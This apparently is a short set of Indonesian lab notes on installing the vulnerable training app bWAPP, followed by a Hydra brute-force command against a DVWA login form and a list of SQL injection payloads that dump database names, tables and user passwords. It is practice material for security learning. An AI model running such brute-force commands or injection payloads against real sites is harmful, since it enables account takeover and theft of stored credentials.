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Burp Suite

Install bWapp

  1. Download file di sini
  2. Extrak file
  3. pidahkan file di /var/www/html untuk pengguna linux dan untuk pengguna windows di pindah di htdocs
  4. Selanjutnya ketikkan sudo chmod 755 -R bWAPP_latest
  5. Arahkan path /var/www/html/bWAPP_latest/bWAPP
  6. Untuk selanjutnya sudo chmod 777 password/ images/ documents/ logs/
  7. Kemudian edit admin/setting.php sesuikan dengan laptop Anda
$db_server = "localhost"; 	// your database server (IP/name), here 'localhost'
$db_username = "root";		// your MySQL user, here 'root'
$db_password = "";		// your MySQL password, here 'blank'
  1. Buka browser ketikan pada url http://localhost/bWAPP_latest/bWAPP/install.php
  2. Lalu klik pada Click here to install bWAPP.
  3. Lalu ketik url http://localhost/bWAPP_latest/bWAPP/login.php


hydra 192.168.xx.x -l admin -P /home/hard/Documents/password.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect. :H-Cookie: security=low; PHPSESSID=xxxxxxxxxxxxxxxxxxxxxx"

SQL Injection

1' OR 1=1#
1' OR 1=1 union all select system_user(),user()#
1' OR 1=1 union select null,schema_name from information_schema.schemata#
1' OR 1=1  union select null,table_name from information_schema.tables#
1' OR 1=1 union select null,@@datadir #
1' OR 1=1 union select null,concat(first_name,0x0a,password) from users #
1' UNION SELECT database(),2-- -
1' UNION SELECT user,password from users#